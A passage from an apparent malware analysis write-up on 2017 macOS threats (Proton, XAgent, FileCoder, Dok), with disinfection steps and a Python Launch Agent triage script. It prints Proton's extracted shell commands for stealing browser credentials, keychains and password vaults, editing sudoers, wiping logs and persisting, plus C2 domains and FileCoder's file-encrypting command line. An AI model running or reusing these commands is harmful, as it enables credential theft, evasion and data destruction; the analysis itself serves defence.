Enter your password to allow this.,\r\nscreencapture -x %@/scr%@.png,\r\nhttps://%@/api/upload,\r\n%@/scr%@.png,\r\nyyyy-MM-dd HH:mm:ss zzz,\r\nping -c 1 %@ 2\u003e/dev/null \u003e/dev/null \u0026\u0026 echo 0,\r\n%@.app,\r\ncat %@/.crd,\r\nif [ -f %@/.bcrd ]; then cat %@/.bcrd; else echo failure; fi,\r\necho '%@:%@:%@' \u003e %@/.crd; ,\r\necho 'printf \"\\033[8;1;1t\"; echo \"%@\" | sudo -S sh -c \"echo 'Defaults !tty_tickets' \u003e\u003e /etc/sudoers\"; killall Terminal; sleep 1;'\r\n\u003e ~/Library/sco.command; chmod 777 ~/Library/sco.command; open ~/Library/sco.command \u0026\u0026 sleep 2.7; rm -rf\r\n~/Library/sco.command;,\r\necho '%@:%@:%@' \u003e %@/.crd,\r\nAKADOMEDO,\r\nCFBundleExecutable,\r\n@%@/proton.zip,\r\n/bin/sh,\r\nhttps://%@,\r\n-c,\r\na%@=`curl -s ,\r\napi_key=%@\u0026cts=%@%@,\r\n-F api_key=%@ -F cts=%@ -F signature=%@ https://%@/api/%@`; echo $a%@;,\r\necho '%@' | sudo -S rm -rf %@ %@/*.zip,\r\ncat %@/.crd,\r\nhcresult=`curl -s --connect-timeout 10 %@` \u0026\u0026 echo $hcresult;,\r\ntype,\r\nname,\r\npath,\r\nsize,\r\ncreation_date,\r\nmodification_date,\r\nfolders,\r\nfiles,\r\ntotal_folders,\r\ntotal_files,\r\nfolder,\r\n--,\r\nrm -rf %@,\r\n%@/.str.txt,\r\n-O -J https://%@,\r\n0aaf7a0da92119ccf0ba,\r\n%@/.tmpdata,\r\nexpiration_date,\r\ngrace_period,\r\nos_version,\r\nchecksum,\r\n%@/.hash,\r\ncodesign -dv %@,\r\nVOID,\r\ncd %@; curl,\r\nhcresult=`curl -sL\r\nhttps://script.google.com/macros/s/AKfycbyd5AcbAnWi2Yn0xhFRbyzS4qMq1VucMVgVvhul5XqS9HkAyJY/exec` \u0026\u0026\r\necho $hcresult;, zip %@/CR.zip ~/Library/Application\\ Support/Google/Chrome/Profile\\ 1/Login\\ Data\r\n~/Library/Application\\ Support/Google/Chrome/Profile\\ 1/Cookies ~/Library/Application\\ Support/Google/Chrome/Profile\\\r\n1/Bookmarks ~/Library/Application\\ Support/Google/Chrome/Profile\\ 1/History ~/Library/Application\\\r\nSupport/Google/Chrome/Profile\\ 1/Web\\ Data; zip %@/CR_def.zip 
~/Library/Application\\\r\nSupport/Google/Chrome/Default/Login\\ Data ~/Library/Application\\ Support/Google/Chrome/Default/Cookies\r\n~/Library/Application\\ Support/Google/Chrome/Default/Bookmarks ~/Library/Application\\\r\nSupport/Google/Chrome/Default/History ~/Library/Application\\ Support/Google/Chrome/Default/Web\\ Data; ,\r\nzip -r %@/FF.zip ~/Library/Application\\ Support/Firefox/$(sh %@/mozilla.sh)/cookies.sqlite ~/Library/Application\\\r\nSupport/Firefox/$(sh %@/mozilla.sh)/formhistory.sqlite ~/Library/Application\\ Support/Firefox/$(sh\r\n%@/mozilla.sh)/logins.json ~/Library/Application\\ Support/Firefox/$(sh %@/mozilla.sh)/logins.json; ,\r\nzip -r %@/SF.zip ~/Library/Cookies ~/Library/Safari/Form\\ Values; ,\r\nzip -r %@/OP.zip ~/Library/Application\\ Support/com.operasoftware.Opera/Login\\ Data ~/Library/Application\\\r\nSupport/com.operasoftware.Opera/Cookies ~/Library/Application\\ Support/com.operasoftware.Opera/Web\\ Data; ,\r\nkillall Console; killall Wireshark; rm -rf %@; ,\r\nmkdir -p %@ %@ ~/Library/LaunchAgents/; chmod -R 777 %@ %@; zip -r %@/KC.zip ~/Library/Keychains/\r\n/Library/Keychains/; %@ %@ %@ %@ zip -r %@/GNU_PW.zip ~/.gnupg ~/Library/Application\\ Support/1Password\\ 4\r\n~/Library/Application\\ Support/1Password\\ 3.9; zip -r %@/proton.zip %@; %@ echo success; , cp -R %@ %@/%@; mv\r\n%@/%@/Contents/MacOS/%@ %@/%@/Contents/MacOS/%@; mv %@/%@/Contents/Resources/Info_.plist\r\n%@/%@/Contents/Info.plist; mv %@/%@/Contents/Resources/%@.plist ~/Library/LaunchAgents/%@.plist; echo success;\r\n,\r\nsed -i -e 's/P_MBN/%@/g' ~/Library/LaunchAgents/%@.plist; sed -i -e 's=P_UPTH=%@/%@/Contents/MacOS/%@=g'\r\n~/Library/LaunchAgents/%@.plist; chmod 644 ~/Library/LaunchAgents/%@.plist; codesign --remove-signature %@/%@;\r\nrm -rf %@/%@/Ic*; launchctl load ~/Library/LaunchAgents/%@.plist; %@ 
,\r\nACTION,\r\nCONSOLE,\r\nFM,\r\nPROC,\r\nSSH_DID_CONNECT,\r\nSSH_DID_TERMINATE,\r\nclsock,\r\n_STROKES,\r\nscreencam,\r\nexec_pointer,\r\nssh_bind_port,\r\nprocs,\r\ntotal_procs,\r\nSSH_DID_NOT_CONNECT,\r\n/Library/Extensions/LittleSnitch.kext,\r\n/Library/Extensions/Radio Silence.kext,\r\n/Library/Extensions/HandsOff.kext,\r\n%@/.tmpdata,\r\n%@/updated.license,\r\nlicense_enforce,\r\nmv %@ %@,\r\nhandbrakestore.com,\r\nhandbrake.cc,\r\nluwenxdsnhgfxckcjgxvtugj.com,\r\n6gmvshjdfpfbeqktpsde5xav.com,\r\nkjfnbfhu7ndudgzhxpwnnqkc.com,\r\nyaxw8dsbttpwrwlq3h6uc9eq.com,\r\nqrtfvfysk4bdcwwwe9pxmqe9.com,\r\nfyamakgtrrjt9vrwhmc76v38.com,\r\nkcdjzquvhsua6hlfbmjzkzsb.com,\r\nypu4vwlenkpt29f95etrqllq.com,\r\nnc -G 20 -z 8.8.8.8 53 \u003e/dev/null 2\u003e\u00261 \u0026\u0026 echo success,\r\necho '%@' \u003e /tmp/public.pem; openssl rsautl -verify -in %@/.tmpdata -pubin -inkey /tmp/public.pem,\r\na90=`curl -s --connect-timeout 10 -o /tmp/au https://%@/rsa` \u0026\u0026 echo \u0026\u0026 echo '%@' \u003e /tmp/au.pub \u0026\u0026 echo success,\r\nopenssl rsautl -verify -in /tmp/au -pubin -inkey /tmp/au.pub,\r\nrm -rf /tmp/*,\r\nsudo -k; echo '%@' | sudo -S rm -rf /var/log/* /Library/Logs/* \u0026\u0026 echo success;,\r\nmv %@/.crd %@/.bcrd,\r\nsudo -k\r\nReading these commands confirms the advertised capabilities (e.g. screencapture, etc.). Note also the checks for the\r\nLittleSnitch, Radio Silence and HandsOff kexts (the malware looks for host-based firewalls), the 'killall Console; killall\r\nWireshark' anti-analysis step, and the 'sudo -S rm -rf /var/log/* /Library/Logs/*' log wiping. 
We can also see that it will\r\ncollect and exfiltrate sensitive user data such as 1Password files, browser login data, keychains, etc:\r\nzip %@/CR.zip ~/Library/Application\\ Support/Google/Chrome/Profile\\ 1/Login\\ Data ~/Library/Application\\\r\nSupport/Google/Chrome/Profile\\ 1/Cookies\r\nzip -r %@/KC.zip ~/Library/Keychains/ /Library/Keychains/; %@ %@ %@ %@ zip -r %@/GNU_PW.zip ~/.gnupg\r\n~/Library/Application\\ Support/1Password\\ 4 ~/Library/Application\\ Support/1Password\\ 3.9; zip -r %@/proton.zip %@;\r\n%@ echo success\r\n disinfection:\r\nAs Proton persists as a Launch Agent, it is trivial to remove manually from an infected system. A slight complication arises\r\nas each variant uses a different file name (for both the Launch Agent plist and the persistent binary). A tool such as\r\nKnockKnock, which displays persistently installed software, can be used to identify the malware's Launch Agent plist. For\r\nexample, below KnockKnock has detected variant 'C' (/Library/LaunchAgents/com.Eltima.UpdaterAgent.plist):\r\nOnce the malicious Launch Agent plist has been determined, one can remove the malware from an infected system via the\r\nfollowing steps (here, file names are specific to variant 'C'):\r\n1. Unload the malware's persistent launch agent via the 'launchctl unload' command\r\n$ launchctl unload /Library/LaunchAgents/com.Eltima.UpdaterAgent.plist\r\n2. Remove the malicious launch agent plist file com.Eltima.UpdaterAgent.plist\r\n3. Remove the malware's persistent binary: /Library/.rand/updateragent.app\r\nRemoving the files is only half the job, though. Since Proton captures the password typed into its fake dialog and exfiltrates\r\nthe keychains, browser login data and 1Password vaults listed above, every credential stored on the machine (and the user's\r\naccount password) should be treated as compromised and rotated.\r\nXAgent:\r\n XAgent\r\nfound: February, BitDefender/PaloAlto Networks\r\ninfection: via OSX/Komplex\r\nfeatures: fully-featured backdoor with a propensity for 'intel-related' data (e.g. 
iOS backups, etc.)\r\ndisinfection: kill process (and remove OSX/Komplex)\r\nwriteups:\r\n\"XAgentOSX: Sofacy's XAgent macOS Tool\" (PaloAlto Networks)\r\n\"OSX/Proton.B, a brief analysis, at 6 miles up\" (P. Wardle/Objective-See)\r\n\"Dissecting the APT28 Mac OS X Payload\" (BitDefender)\r\nOSX/XAgent is APT28/Fancy Bear's fully-featured 2nd-stage macOS implant, installed via a 1st-stage implant,\r\nOSX/Komplex.\r\n infection:\r\nIn late 2016, PaloAlto Networks discovered a new macOS backdoor, OSX/Komplex, that was \"associated with the Sofacy\r\ngroup [APT28]\". In their writeup titled, Sofacy's 'Komplex' OS X Trojan, they described its infection vector, persistence, and\r\nfeatures, noting amongst other things: \"it is capable of downloading additional files...\".\r\nI discussed Komplex both in the Objective-See \"Mac Malware of 2016\" blog post, as well as in an RSA talk on the same\r\ntopic:\r\nDuring my presentation, I noted that it seemed reasonable to assume that Komplex (which is a rather basic piece of\r\nmalware) was simply a 1st-stage implant that likely downloaded and executed a 2nd-stage (more feature-complete) implant\r\non targets of interest. With the discovery of XAgent, this was largely confirmed! Specifically, BitDefender, who performed a\r\nrather in-depth analysis of XAgent, state:\r\n\"[the Komplex payload] is the final component of the Komplex malware, with the sole purpose of downloading and\r\nexecuting a file, as requested by the C\u0026C servers.\r\nIn other words, Komplex is an APT28/Sofacy component that can be distributed via email, disguised as a PDF document, to\r\nestablish a foothold in a system. Once it infects the host, it can download and run the next APT28/Sofacy component, which\r\n- to the best of our knowledge - is the XAgent malware...\r\nOur assumption is guided by hard evidence included in the binary. 
Our forensics endeavor revealed a number of indicators\r\nthat made us think XAgent was distributed via Komplex malware\"\r\nPaloAlto Networks also echoes this, noting: \"We believe it is possible that Sofacy uses Komplex to download and install the\r\nXAgentOSX tool to use its expanded command set on the compromised system.\"\r\nIn other words, XAgent may not have an independent infection vector, but instead relies on OSX/Komplex infections.\r\n persistence:\r\nAs of yet, I have not uncovered anything that indicates that XAgent actually persists. None of the analysis reports (from the\r\nAV companies) mentions persistence, and reversing the malware's binary doesn't reveal any (apparent) persistence logic.\r\nCould this mean its persistence mechanism just hasn't been figured out yet? Possibly. However, I think there may be a more\r\nplausible answer, one that involves XAgent's relationship with Komplex.\r\nRecall that XAgent is downloaded and executed by Komplex. That is to say, it is dependent on Komplex, at least in terms of\r\ngetting onto macOS systems. Now, Komplex is persistent, via the Launch Agent\r\n~/Library/LaunchAgents/com.apple.updates.plist file:\r\n$ cat ~/Library/LaunchAgents/com.apple.updates.plist\r\n\u003c?xml version=\"1.0\" encoding=\"UTF-8\"?\u003e\r\n\u003cplist version=\"1.0\"\u003e\r\n\u003cdict\u003e\r\n  \u003ckey\u003eLabel\u003c/key\u003e\r\n  \u003cstring\u003ecom.apple.updates\u003c/string\u003e\r\n  \u003ckey\u003eProgramArguments\u003c/key\u003e\r\n  \u003carray\u003e\r\n    \u003cstring\u003e/Users/Shared/.local/kextd\u003c/string\u003e\r\n  \u003c/array\u003e\r\n  \u003ckey\u003eRunAtLoad\u003c/key\u003e\r\n  \u003ctrue/\u003e\r\n  ...\r\nAs the RunAtLoad key is set to true, each time the user logs back in (e.g. after a reboot), Komplex (/Users/Shared/.local/kextd)\r\nwill be automatically (re)executed by the OS. Once Komplex is running, it will check in with its command \u0026 control servers.\r\nDepending on the configuration of these servers or tasking from the remote attackers, a command to restart XAgent could\r\nperhaps be issued. Or, XAgent could be fully (re)downloaded and (re)executed. This approach would minimize the footprint\r\nof XAgent, as persistence events (i.e. 
the creation of a Launch Agent plist file) are both 'noisy' and trivial to detect.\r\nAnother scenario that could explain the lack of persistence may be that the attackers did not need (nor want) XAgent to\r\npersist. Running it once (via Komplex), collecting all data of intelligence value, then (possibly) issuing a command to delete\r\nthe XAgent binary would certainly reduce the likelihood of its detection. As 2nd-stage implants such as XAgent usually\r\nrepresent a significant development effort (both in terms of time and cost), attackers will often take steps (such as\r\nupload/execute/delete) to prevent their detection and ensure their longevity!\r\n features:\r\nXAgent is a fully-featured macOS backdoor, with a propensity for the collection of data that may hold intelligence value.\r\nFor example, dumping the Objective-C class information via jtool, we see classes and methods responsible for keylogging,\r\napp injection, screen capturing, password stealing, and even discovery of iOS backups:\r\n$ ./jtool -d objc -v XAgent\r\n@interface Keylogger\r\n/* 0 - 0x100010708 */ - init;\r\n/* 1 - 0x1000108f2 */ - initEventTapAndStartRunLoop;\r\n/* 2 - 0x1000109fa */ - setAccessibilityApplication;\r\n...\r\n/* 7 - 0x100010e80 */ - start;\r\n/* 8 - 0x100010fad */ - stop;\r\n...\r\n/* 11 - 0x100011030 */ - sendLog;\r\n...\r\n@interface InjectApp\r\n/* 0 - 0x10000fb18 */ - init;\r\n/* 1 - 0x10000fb45 */ - isInjectable:;\r\n/* 2 - 0x10000fbe3 */ - sendEventToPid:;\r\n/* 3 - 0x10000fdff */ - injectRunningApp;\r\n@interface ScreenShot\r\n/* 0 - 0x100015c38 */ - takeScreenShot;\r\n/* 1 - 0x100015c97 */ - convertImageToData:;\r\n/* 2 - 0x100015dc4 */ - takeScreenShotImage;\r\n@interface Password\r\n/* 0 - 0x10001662d */ - init;\r\n...\r\n/* 4 - 0x100016dcb */ - getFirefoxPassword;\r\n@interface MainHandler\r\n...\r\n/* 11 - 0x10000b9d7 */ - showBackupIosFolder;\r\n@interface RemoteShell\r\n...\r\n/* 5 - 0x100018ccd */ - checkBackupIosDeviceFolder;\r\nTaking a peek 
at the malware's decompilation for the 'checkBackupIosDeviceFolder' method reveals it invoking popen to\r\nexecute ls -la ~/Library/Application\\ Support/MobileSync/Backup/. This will, as its name suggests, check for (or list) any iOS\r\nbackups stored on the infected Mac. Obviously iOS backups contain an (unparalleled?) wealth of data and information!\r\nvoid * -[RemoteShell checkBackupIosDeviceFolder](void * self, void * _cmd) {\r\n   ...\r\n   rbx = popen(\"ls -la ~/Library/Application\\ Support/MobileSync/Backup/\", \"r\");\r\nNote: for an interesting connection between XAgent and the Italian HackingTeam, see Objective-See's blog post, From Italy\r\nWith Love? Finding HackingTeam Code in Russian Malware.\r\nIn terms of other features, as shown in BitDefender's report, \"Dissecting the APT28 Mac OS X Payload\", XAgent\r\nunsurprisingly also supports more prosaic commands:\r\ndisinfection:\r\nAs XAgent does not appear to persist itself, removing it simply involves terminating the backdoor and deleting its binary.\r\nUnfortunately, the malware contains logic to generate a random path and name for itself, so figuring out the location of the\r\nbackdoor at first seems complicated. 
Below is the decompilation of the generateRandomPathAndName method, which is\r\nresponsible for implementing this logic:\r\nvoid * +[Launcher generateRandomPathAndName](void * self, void * _cmd) {\r\n   r15 = [NSArray arrayWithObjects:@\"kshd\", @\"paxs\", @\"exprd\", @\"rcp\", @\"sync\", @\"kex\", @\"zsc\",\r\n          @\"scpo\", @\"ddl\", @\"update\", @\"zsg\", @\"rep\", @\"skgc\", ..., 0x0];\r\n       var_38 = r15;\r\n   rax = [NSArray arrayWithObjects:@\".localized\", @\".com.apple.kshd\", @\".com.apple.erx\",\r\n          @\".com.apple.fsg\", @\".com.apple.ulk\", @\".com.apple.wsat\", ..., 0x0];\r\n   r14 = [rax count];\r\n   var_40 = [r15 count];\r\n   r15 = NSHomeDirectory();\r\n   r14 = [rax objectAtIndex:[Launcher randomInteger:0x0 max:r14]];\r\n   r12 = [NSString stringWithFormat:@\"%@/Library/Assistants/.local/%@\", r15, r14];\r\n   rbx = [NSFileManager defaultManager];\r\n   [rbx createDirectoryAtPath:r12 withIntermediateDirectories:0x1 attributes:0x0 error:0x0];\r\n   rbx = [var_38 objectAtIndex:[Launcher randomInteger:0x0 max:var_40]];\r\n   r14 = [NSString stringWithFormat:@\"%@/%@\", r12, rbx];\r\n   return rax;\r\n}\r\nAs can be seen, the malware will randomly pick a (sub)directory and file name for itself from two hard-coded lists. However,\r\nas the path is not fully randomized (i.e. it always starts with ~/Library/Assistants/.local/), one can simply look for a running\r\nprocess whose path is prefixed with that directory.\r\nSince ~/Library/Assistants/.local/ is a non-standard directory created by the malware, if one is infected there should only be\r\na single process running out of this directory:\r\n$ ps aux | grep -i /Library/Assistants/.local\r\nuser 666 /Users/user/Library/Assistants/.local/.com.apple.kshd/mpil\r\nKill this process (e.g. kill -9 666), and delete the ~/Library/Assistants/.local/ directory to clean up an XAgent infection.\r\nAs noted though, XAgent is dependent on Komplex. 
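The manual checks above (KnockKnock for Proton's Launch Agent, ps for XAgent's ~/Library/Assistants/.local/ directory, and a look for Komplex's ~/Library/LaunchAgents/com.apple.updates.plist) can be scripted for quick triage. The Python below is an added example written for this page; it is not Objective-See's code nor a tool from any of the writeups cited. It parses Launch Agent plists with the standard-library plistlib module and flags the traits these specimens share (an Apple-style label outside /System, a program hiding in a dot-directory or in a staging location such as /tmp or /Users/Shared, a socat relay to a .onion), and applies the same hidden-directory test to lines of ps -axo pid=,user=,comm= output (on macOS, comm prints the executable path). The plists and ps lines it builds are constructed samples, and the executable name inside Proton.C's updateragent.app is assumed. A hit is a lead for a person to examine, not a verdict: Proton.B's ~/Library/RenderFiles/activity_agent.app would pass these heuristics, so the full listing still needs reading.

```python
"""Triage of Launch Agent plists and process paths for the traits described above.

Added example for this page; not Objective-See's code and not from any cited
writeup. The plists and ps lines built in demo() are constructed samples.
"""
import os
import plistlib
import re
import tempfile

# Apple's own agents live under /System/Library; a "com.apple." label anywhere
# else (Komplex's com.apple.updates, Proton.D's com.apple.xpcd) deserves a look.
APPLE_LIKE = re.compile(r"^com\.apple\.")
# A dot-directory anywhere in the path (XAgent's .local, Komplex's .local, Proton.C's .rand).
HIDDEN_COMPONENT = re.compile(r"(^|/)\.[^/]+/")
# Staging locations the specimens above dropped into.
STAGING_DIRS = ("/tmp/", "/private/tmp/", "/Users/Shared/")
# Directories the specimens in this post ran from; extend as new ones appear.
PROCESS_IOCS = ("/Library/Assistants/.local/", "/Users/Shared/.local/", "/Library/.rand/")


def program_of(plist):
    """Path launchd will execute: Program, else ProgramArguments[0], else ''."""
    args = plist.get("ProgramArguments") or []
    return plist.get("Program") or (args[0] if args else "")


def triage_plist(plist_path, plist):
    """Return the reasons a job deserves manual review; an empty list means nothing odd."""
    reasons = []
    label = plist.get("Label", "")
    prog = program_of(plist)
    argv = " ".join(plist.get("ProgramArguments") or [])
    if APPLE_LIKE.match(label) and not plist_path.startswith("/System/"):
        reasons.append(f"Apple-style label {label!r} outside /System")
    if HIDDEN_COMPONENT.search(prog):
        reasons.append(f"program in hidden directory: {prog}")
    if prog.startswith(STAGING_DIRS):
        reasons.append(f"program in staging directory: {prog}")
    if os.path.basename(prog) == "socat" or ".onion" in argv:
        reasons.append("relay to a .onion persisted as a job (Dok pattern)")
    return reasons


def scan(dirs):
    """Walk LaunchAgents/LaunchDaemons dirs; return (path, label, program, reasons) per flagged job."""
    findings = []
    for d in dirs:
        if not os.path.isdir(d):
            continue
        for name in sorted(os.listdir(d)):
            if not name.endswith(".plist"):
                continue
            path = os.path.join(d, name)
            try:
                with open(path, "rb") as fh:
                    plist = plistlib.load(fh)        # XML or binary plist
            except Exception as exc:                 # corrupt/odd plist: still worth a look
                findings.append((path, None, None, [f"unparseable plist: {exc}"]))
                continue
            reasons = triage_plist(path, plist)
            if reasons:
                findings.append((path, plist.get("Label"), program_of(plist), reasons))
    return findings


def suspicious_processes(ps_lines):
    """ps_lines: lines of `ps -axo pid=,user=,comm=` (comm is the full path on macOS)."""
    hits = []
    for line in ps_lines:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, _user, path = parts
        if any(ioc in path for ioc in PROCESS_IOCS) or HIDDEN_COMPONENT.search(path):
            hits.append((int(pid), path))
    return hits


def demo():
    """Write three constructed agents (mimicking Proton.C, Komplex and a benign one) and scan them."""
    tmp = tempfile.mkdtemp()
    samples = {
        "com.Eltima.UpdaterAgent.plist": {   # Proton.C; executable name inside the .app is assumed
            "Label": "com.Eltima.UpdaterAgent",
            "ProgramArguments": ["/Library/.rand/updateragent.app/Contents/MacOS/updateragent"],
            "RunAtLoad": True},
        "com.apple.updates.plist": {         # Komplex, as dumped in the XAgent section
            "Label": "com.apple.updates",
            "ProgramArguments": ["/Users/Shared/.local/kextd"],
            "RunAtLoad": True},
        "com.example.helper.plist": {        # a plausible benign third-party agent
            "Label": "com.example.helper",
            "ProgramArguments": ["/Applications/Example.app/Contents/MacOS/helper"],
            "RunAtLoad": True},
    }
    for name, plist in samples.items():
        with open(os.path.join(tmp, name), "wb") as fh:
            plistlib.dump(plist, fh)
    return scan([tmp])


if __name__ == "__main__":
    for path, label, prog, reasons in demo():
        print(f"{label} ({prog}): {'; '.join(reasons)}")
```

On a live Mac, call scan() with the expanded ~/Library/LaunchAgents, /Library/LaunchAgents and /Library/LaunchDaemons, and feed suspicious_processes() the output of ps -axo pid=,user=,comm=. The demo flags the Proton.C and Komplex agents and leaves the benign helper alone.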
Thus, if an XAgent infection is found, check for Komplex as well (details\r\nhere).\r\nFileCoder (FindZip/Patcher):\r\n FileCoder (FindZip/Patcher)\r\nfound: February, ESET\r\ninfection: Fake 'Patcher' Applications\r\nfeatures: file encryption for ransom\r\ndisinfection: terminate application\r\nwriteups: \"New crypto-ransomware hits macOS\" (ESET)\r\nThis poorly coded piece of macOS ransomware encrypts all user files with a (pseudo)randomly generated encryption key that\r\nis neither saved nor transmitted to the remote attacker. Fortunately a 'known plaintext attack' can decrypt ransomed files!\r\n infection:\r\nIt's a well known 'security mantra' that running apps related to pirating software is a terrible idea! And FileCoder\r\n(FindZip/Patcher) is a perfect example of why. Distributed via BitTorrent distro sites, this malware masquerades as software\r\nable to crack (or patch) popular applications, such as Adobe Premiere Pro and Microsoft Office.\r\nIn their report, \"New crypto-ransomware hits macOS\", ESET researchers provide the following screen shot of the malware\r\n(\"ostensibly an application for pirating popular software\"):\r\nIf the user downloads and attempts to run the application (for example to crack Adobe or Microsoft products), Gatekeeper\r\nshould block the malware. This is because, though the malware is signed, it is signed 'ad-hoc', meaning it is not\r\nsigned by Apple (or by an Apple Developer ID). 
This can be seen via jtool (Apple's own codesign -dv reports the same thing as 'Signature=adhoc'):\r\n$ ./jtool --sig \"Office 2016 Patcher.app/Contents/MacOS/Office 2016 Patcher\"\r\nBlob at offset: 43776 (9936 bytes) is an embedded signature\r\nCode Directory (339 bytes)\r\n   Version: 20100\r\n   Flags: adhoc (0x2)\r\n   CodeLimit: 0xab00\r\n   Identifier: NULL.prova (0x30)\r\n   CDHash: 0d35855003ce4f920addb805fb240786443169c4 (computed)\r\nOr, if one prefers a UI application to view signing information, my WhatsYourSign Finder extension will display this\r\ninformation as well:\r\nNow, if the user disables Gatekeeper, or explicitly agrees to allow the malicious application to execute, they will become\r\ninfected.\r\n persistence:\r\nAs is often the case with ransomware, which has no need to persist (it simply encrypts users' files, then exits), FileCoder\r\nmakes no effort to install itself persistently. From the malware author's point of view, avoiding the need to persist simplifies\r\nthe malware creation process.\r\n features:\r\nFileCoder does one thing: encrypt user files for ransom. When executed it displays a window with a 'START' button:\r\nClicking this button executes the function sub_100001f50. 
Extracting strings from this massive function reveals its likely\r\npurpose: encrypting user files:\r\nPress START button to crack/patch Office 2016\r\nPatching Office Please Wait\r\nProcess 0/3\r\n/Documents/README!.txt\r\n...\r\n/usr/bin/find\r\n-iname\r\nREADME!.txt-print\r\nexec\r\ntouch\r\n-mt\r\n201002130000\r\n{}\r\n;\r\n/Users/\r\n-not\r\nzip\r\n-0\r\n-P\r\n{}.crypt\r\nrm\r\nPatching Office Please Wait\r\nIt may take up to 10 minutes\r\nProcess 1/3\r\n/Desktop/README\r\n/Desktop/HOW_TO_DECRYPT\r\n/Desktop/DECRYPT\r\n-maxdepth\r\nPatching Office Please Wait\r\nIt may take up to 10 minutes\r\nProcess 2/3\r\n/Volumes/\r\n/usr/bin/diskutil\r\nsecureErase\r\nfreespace\r\nDONE!\r\nRead the README.txt file on your Desktop!\r\nRunning a process monitor (such as my open-source ProcInfo tool) confirms the malware's malicious behavior. Specifically\r\nwe can see it executing the built-in find utility to, well, find user files, then executing the zip utility with the -P flag to create a\r\npassword-protected zip file (password here, gpcwPophFOZQjMDUnfQoqv9Ry):\r\n# ./procInfo\r\nprocess start:\r\n  pid: 1258\r\n  path: /usr/bin/find\r\n  user: 501\r\n  args: (\r\n    \"/usr/bin/find\",\r\n    \"/Users/\",\r\n    \"-not\",\r\n    \"-iname\",\r\n    \"README!.txt\",\r\n    \"-print\",\r\n    \"-exec\",\r\n    zip,\r\n    \"-0\",\r\n    \"-P\",\r\n    gpcwPophFOZQjMDUnfQoqv9Ry,\r\n    \"{}.crypt\",\r\n    \"{}\",\r\n    \";\",\r\n    \"-exec\",\r\n    rm,\r\n    \"{}\",\r\n    \";\",\r\n    \"-exec\",\r\n    touch,\r\n    \"-mt\",\r\n    201002130000,\r\n    \"{}.crypt\",\r\n    \";\"\r\n)\r\nTwo details of this command line are worth noting. Each file is zipped into its own {}.crypt archive (all with the same\r\npassword) and the original is then deleted; and 'touch -mt 201002130000' resets the modification time of every .crypt file to\r\n13 February 2010, which is a handy indicator when hunting for encrypted files. The third stage seen in the strings\r\n(diskutil secureErase freespace) then wipes free space, so the deleted originals cannot simply be carved back off the disk.\r\nOnce the ransomware has encrypted user files (under /Users and /Volumes), a README!.txt can be found on the desktop.\r\nOpening this reveals the ransom instructions:\r\nAs the key generated to encrypt the user files is generated (pseudo)randomly and neither 
stored nor transmitted to the remote\r\nattacker, the files won't be 'decryptable' even if the user pays the bitcoin ransom.\r\nLuckily, Sophos describes a trivial method to decrypt the ransomed files! In short, the legacy PKZIP stream cipher\r\n('ZipCrypto') that zip uses for password-protected archives is susceptible to a known-plaintext attack (Biham and Kocher's,\r\nimplemented by tools such as pkcrack): a small amount of known plaintext from one file recovers the cipher's internal key\r\nstate, which is the same for every archive created with the same password, i.e. for every .crypt file on the machine. And\r\nsince FileCoder passes -0 (store, no compression), any file whose original contents can be obtained elsewhere supplies that\r\nplaintext byte for byte. Since the malware 'depends' on zip to encrypt the user files, the whole ransoming scheme falls apart.\r\nWin one for the users!\r\n disinfection:\r\nAs the malware doesn't persist, there really isn't much to do to disinfect a system besides terminating and deleting the\r\nransomware:\r\n$ ps aux | grep Patcher\r\nuser 1155 ~/Desktop/Office 2016 Patcher.app/Contents/MacOS/Office 2016 Patcher\r\n$ kill -9 1155\r\nOf course by this time (if the ransomware is already running) it's likely too late!\r\n Dok (Retefe)\r\nfound: April, CheckPoint\r\ninfection: email campaign with malware attached\r\nfeatures: web traffic MitM (to steal banking info)\r\ndisinfection: remove login item and launch agents\r\nwriteups:\r\n\"OSX Malware is Catching Up \u0026 wants to Read Your HTTPS Traffic\" (CheckPoint)\r\n\"New OSX.Dok malware intercepts web traffic\" (MalwareBytes)\r\nA macOS port of the Windows 'Retefe' banking trojan, this malware installs a malicious proxy server to Man-in-the-Middle\r\n(MitM) all web traffic in order to sniff out victims' bank credentials and manipulate traffic to gain access to financial\r\naccounts.\r\n infection:\r\nAs noted by the security researchers at CheckPoint who originally discovered OSX/Dok (read their writeup here), Dok\r\ntargets users via email: \"[Dok] is the first major scale malware to target OSX users via a coordinated email phishing\r\ncampaign.\"\r\nBelow is a screen-capture of one such phishing email, targeting German users (image credit CheckPoint):\r\nAttached to the malicious 
emails is a zip file (Dokument.zip) that contains the malware. Users that naively believe the\r\ninstructions in the email and unzip Dokument.zip will find a single file named Dokument:\r\nBy using a (rather pixelated) icon that mimics Apple's 'Preview' application, the attacker clearly hopes to trick the user into\r\nopening this file. By using WhatsYourSign we can see this file is not a document, but in fact a signed application (though\r\nApple has now revoked the certificate):\r\nIf the user opens the application, and clicks through the standard \"is an application downloaded from the Internet. Are you sure\r\nyou want to open it?\" warning dialog, they will become infected.\r\n persistence:\r\nSomewhat interestingly, OSX/Dok persists in two phases: first as a Login Item, then as Launch Agents.\r\nWhen Dok is (naively) launched by the user, it will execute logic to persist as a Login Item. As their name implies, Login\r\nItems will execute an application when the user logs in. Apple describes how to create a Login Item both manually and\r\nprogrammatically.\r\nTo persist itself as a Login Item, Dok will invoke the AddLoginScript method:\r\nvoid -[AppDelegate AddLoginScript](void * self, void * _cmd) {\r\n   r14 = [NSDictionary new];\r\n   r15 = [[NSString stringWithFormat:@\"tell application \\\"System Events\\\" to make\r\n         login item at end with properties {path:\\\"%@\\\"}\", self-\u003eneedLocation] retain];\r\n   rbx = [[NSAppleScript alloc] initWithSource:r15];\r\n   var_28 = r14;\r\n   [rbx executeAndReturnError:\u0026var_28];\r\n   return;\r\n}\r\nAs can be seen in the AddLoginScript decompilation, Dok utilizes AppleScript to create the Login Item. 
